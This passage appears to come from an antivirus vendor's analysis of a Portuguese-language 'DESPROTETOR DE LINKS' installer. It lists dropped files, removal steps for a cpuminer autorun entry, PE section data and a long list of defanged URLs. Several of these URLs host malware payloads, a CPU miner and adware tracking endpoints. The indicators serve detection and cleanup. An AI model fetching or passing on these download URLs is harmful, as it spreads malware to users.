    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: g3CvT78vSMa0N0LPai7QvtmUwmghB
Product Name: g3CvT78vSMa0N0LPai7QvtmUw
Product Version:
Legal Copyright:
Legal Trademarks: g3CvT78vSMa0N0LP
Original Filename:
Internal Name:
File Version: 5.9.1.7
File Description:
Comments:
Language: Language Neutral

Company Name: g3CvT78vSMa0N0LPai7QvtmUwmghBProduct Name: g3CvT78vSMa0N0LPai7QvtmUwProduct Version: Legal Copyright: Legal Trademarks: g3CvT78vSMa0N0LPOriginal Filename: Internal Name: File Version: 5.9.1.7File Description: Comments: Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623130235524.448410bc2ffd32265a08d72b795b18265828d
.rdata28672449646083.59163f179218a059068529bdb4637ef5fa28e
.data3686411048810243.26405975304d6dd6c4a4f076b15511e2bbbc0
.ndata1474564096000d41d8cd98f00b204e9800998ecf8427e
.rsrc188416312835842.772037eed741492caf0627f19fc4adb8750fe

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://4threquest.me/310714d/310714_mb.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://4threquest.me/310714d/310714_is.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://goo.gl/Bw14Po
hxxp://4threquest.me/310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://4threquest.me/registro/310113f8.htm
hxxp://rp.beyabir.com/?pcrc=236440515&v=2.0
hxxp://4threquest.me/registro/icone_cadeado.gif
hxxp://4threquest.me/registro/carregando.gif
hxxp://4threquest.me/registro/top-line.gif
hxxp://4threquest.me/8Hk4o
hxxp://info.beyabir.com/?v=1.03&c=04dec24f&at=620310157&cntr=0
hxxp://4threquest.me/010914s/010914i.htm
hxxp://mobimidia.com/mobile/MobiMidia_validation.js
hxxp://4threquest.me/010914s/verificar_ip.php
hxxp://rp.beyabir.com/?pcrc=1901405883&v=2.0
hxxp://4threquest.me/010914s/contabilizar.php?id=230313
hxxp://t1.extreme-dm.com/i.gif
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://os.beyabir.com/YBRInternet/?v=5.0&c=1840466908
hxxp://4threquest.me/ids/id230313/stats_confirma.htm
hxxp://desprotetordelinks.me/ironsrc_prot.png?nocache=1
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://mobimidia.com/mobile/mt-core.js
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://rp.beyabir.com/?pcrc=718955205&v=2.0
hxxp://rp.beyabir.com/?pcrc=497235937&v=2.0
hxxp://rp.beyabir.com/?pcrc=629602451&v=2.0
hxxp://img.beyabir.com/img/Global/declineBG.png
hxxp://img.beyabir.com/img/Global/Yes_Button.png
hxxp://rp.beyabir.com/?pcrc=688063635&v=2.0
hxxp://loadmoney.ru/get_info?pid=7718148.251.75.52
hxxp://img.beyabir.com/img/Global/Yes_Button_Hover.png
hxxp://4threquest.me/desprotetor_setup.exe
hxxp://img.beyabir.com/img/Global/No_Button.png
hxxp://img.beyabir.com/img/Global/No_Button_Hover.png
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://img.beyabir.com/img/Sihehihi/Sihehihi_31_03_15.png
hxxp://img.beyabir.com/img/Rerarapepe/logo.png
hxxp://img.beyabir.com/img/Rerarapepe/logo_new.png
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe3.jpg
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe.png
hxxp://img.beyabir.com/img/Rerarapepe/Rerarapepe_b.png
hxxp://img.beyabir.com/img/Rerarapepe/RerarapepeV2_BG4.jpg
hxxp://4threquest.me/310714d/310714_cp.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://img.beyabir.com/ofr/isicicc2.7.cis
hxxp://4threquest.me/310714d/310714_ub.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt
hxxp://4threquest.me/150814s/150814c.htm
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en
hxxp://54.171.12.129/SL2
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/cpuminer-x11opt-setup.exe
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php
hxxp://www.ejpkwz.cc/3517/1
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php
hxxp://www.ejpkwz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
hxxp://4threquest.me/310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://4threquest.me/310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/index.php
hxxp://dyno3mlj15jgv.cloudfront.net/V19/amipb.js
hxxp://plainsavingscenter.com/fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ==
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/finalize.php
hxxp://plainsavingscenter.com/ii?alpha=Bj59QGU6aDIwbQspUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5heVFnQSRmRzB7OxUuY1ogcw85ET4oP2ZmBCpUC0IwLA81GwIhaUlRajUTYihqJ3MUB0gNQjkTOiwcbQJtBEISfmtqAx8IMWYgU2xhSGouBHd2dmBOb3d7JmxAeQZkUjZlQD8QBCh0BnklMgRrGXcuUQlhEU0WeF17PBtjYyleFkYrf2YDPQY+ezsganhebCQdfSUBMwA9Nj17d1Z/A2lDOmMQOQAXbXZaVydxTCRbNngDRkUUQhxwF01ySy9aKFlQCw1iZhg2A3IIAWE+a0g3cRpkdhUvTjloMSxmATkPcABzIFZiRR8sOwsEdmRGPl8uchcYDEgSSCAeLmxDJw4dUBxQPSprAz4Jbx87XwRPHXo4GXF2ZUp/RVkqMTRdGX8+US10SnA1PzpnSVFsBx92Hm0pSQllWHAxRGMoWEUwWHt1FVUxb2pKIwxvfRBuKTMKOC1JIw86ag9uWUk=
hxxp://plainsavingscenter.com/if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk=
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=pcm&uid=535559167_198339_B48A115F184.173.191.224
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp
hxxp://brsoftwarellc.com/services/rules.txt?dummy=779
hxxp://related.deals/services/stores?dummy=593
hxxp://brsoftwarellc.com/services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268
hxxp://related.deals/services/rules?dummy=865
hxxp://download.dynect.mozilla.net/?product=firefox-34.0.5-complete&os=win&lang=en-US
hxxp://related.deals/services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677
hxxp://a1284.g.akamai.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar
hxxp://www.google.com/
hxxp://www.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg173.194.113.207
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok
hxxp://www.gosaferllc.com/services/rules.txt?dummy=908
hxxp://www.gosaferllc.com/services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408
hxxp://www.ninjasoftwarellc.com/services/rules.txt?dummy=328167.114.34.238
hxxp://www.ninjasoftwarellc.com/services/update.php?v=1.2.0&key=RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0&dummy=744167.114.34.238
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish
hxxp://www.ejpkwz.cc/3517/2
hxxp://www.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
hxxp://rp.beyabir.com/?pcrc=216881437&v=2.0
hxxp://rp.beyabir.com/?pcrc=1431802907&v=2.0
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm
hxxp://brsoftwarellc.com/services/rules.txt?dummy=100
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.RegWrite
hxxp://xa.xingcloud.com/v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync
hxxp://xa.xingcloud.com/v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist
hxxp://xa.xingcloud.com/v4/sof-ient/535559167_198339_B48A115F?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm
hxxp://xa.xingcloud.com/v4/sof-ient/535559167_198339_B48A115F?action1=install.pcm
hxxp://xa.xingcloud.com/v4/searchprotect/535559167_198339_B48A115F?action0=xa.geoip&action1=visit&action2=install
hxxp://xa.xingcloud.com/v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253
hxxp://www.theviilage.com/windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv=50.97.33.37
hxxp://www.theviilage.com/searchprotect/up?ptid=pcm&sid=IHProtectPlugin&ln=en_us&ver=4.0.1.2253&uid=535559167_198339_B48A115F&dp=050.97.33.37
hxxp://a1284.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f9655da909467756
hxxp://a1363.dscg.akamai.net/pki/crl/products/WinPCA.crl
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146
hxxp://a1363.dscg.akamai.net/pki/crl/products/microsoftrootcert.crl
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQdI2+OBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc=72.167.239.239
hxxp://ocsp.godaddy.com.akadns.net//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi72.167.239.239
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==72.167.239.239
hxxp://ocsp.godaddy.com.akadns.net//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs=72.167.239.239
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg==72.167.239.239
hxxp://ocsp.godaddy.com.akadns.net//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g==72.167.239.239
hxxp://a1284.g.akamai.net/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962
hxxp://crl.globalsign.net/root-r3.crl
hxxp://crl.globalsign.net/gscodesignsha2g2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQpEOCqbmTiQA9OjY//t2aa8NSkuwQUGUq4WuRNMaUU5V7sL6Mc+oCMMmsCEhEhJz1lhSyxS2RYZQVJ48M2bQ==
hxxp://crl.globalsign.net/root.crl
hxxp://crl.globalsign.net/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA==
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc=
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
hxxp://ocsp.godaddy.com.akadns.net//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/72.167.239.239
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U=
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c=
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8=
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=100
hxxp://www.related.deals/services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677
hxxp://www.amoninst.com/finalize.php23.21.163.124
hxxp://www.mobimidia.com/mobile/mt-core.js
hxxp://www.amoninst.com/thankyou.php23.21.163.124
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146
hxxp://www.mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://www.related.deals/services/rules?dummy=865
hxxp://www.lawfuldownload.com/tdownload.php
hxxp://www.amoninst.com/index.php23.21.163.124
hxxp://www.related.deals/services/stores?dummy=593
hxxp://ocsp.godaddy.com//MEgwRjBEMEIwQDAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CBwQSlx3KmUs=72.167.239.239
hxxp://install.plainsavingscenter.com/fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ==
hxxp://download.cdn.mozilla.net/pub/firefox/releases/34.0.5/update/win32/en-US/firefox-34.0.5.complete.mar87.245.221.112
hxxp://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCGmkT8+Jklzi72.167.239.239
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962
hxxp://cdneu.beyabir.com/ofr/isicicc2.7.cis
hxxp://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ==72.167.239.239
hxxp://www.4threquest.me/310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt
hxxp://www.4threquest.me/010914s/verificar_ip.php
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U=
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=779
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg==72.167.239.239
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl
hxxp://install.plainsavingscenter.com/ii?alpha=Bj59QGU6aDIwbQspUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5heVFnQSRmRzB7OxUuY1ogcw85ET4oP2ZmBCpUC0IwLA81GwIhaUlRajUTYihqJ3MUB0gNQjkTOiwcbQJtBEISfmtqAx8IMWYgU2xhSGouBHd2dmBOb3d7JmxAeQZkUjZlQD8QBCh0BnklMgRrGXcuUQlhEU0WeF17PBtjYyleFkYrf2YDPQY+ezsganhebCQdfSUBMwA9Nj17d1Z/A2lDOmMQOQAXbXZaVydxTCRbNngDRkUUQhxwF01ySy9aKFlQCw1iZhg2A3IIAWE+a0g3cRpkdhUvTjloMSxmATkPcABzIFZiRR8sOwsEdmRGPl8uchcYDEgSSCAeLmxDJw4dUBxQPSprAz4Jbx87XwRPHXo4GXF2ZUp/RVkqMTRdGX8+US10SnA1PzpnSVFsBx92Hm0pSQllWHAxRGMoWEUwWHt1FVUxb2pKIwxvfRBuKTMKOC1JIw86ag9uWUk=
hxxp://ocsp2.globalsign.com/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhhrE10BUs2OqNBLZ9KgzPNA==108.162.232.198
hxxp://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/72.167.239.239
hxxp://install.plainsavingscenter.com/if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk=
hxxp://cdn1.lawfuldownload.com/V19/amipb.js54.230.95.118
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://www.4threquest.me/010914s/010914i.htm
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI=
hxxp://www.4threquest.me/010914s/contabilizar.php?id=230313
hxxp://ocsp.godaddy.com//MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g==72.167.239.239
hxxp://www.software-forus.com/CPUminer/cpuminer-x11opt-setup.exe205.185.216.42
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488&dummy=268
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEGO+CyDUoFQBjrKVo87pCRc=
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://clients1.google.com/ocsp
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?daa3db62222adfef
hxxp://www.4threquest.me/registro/310113f8.htm
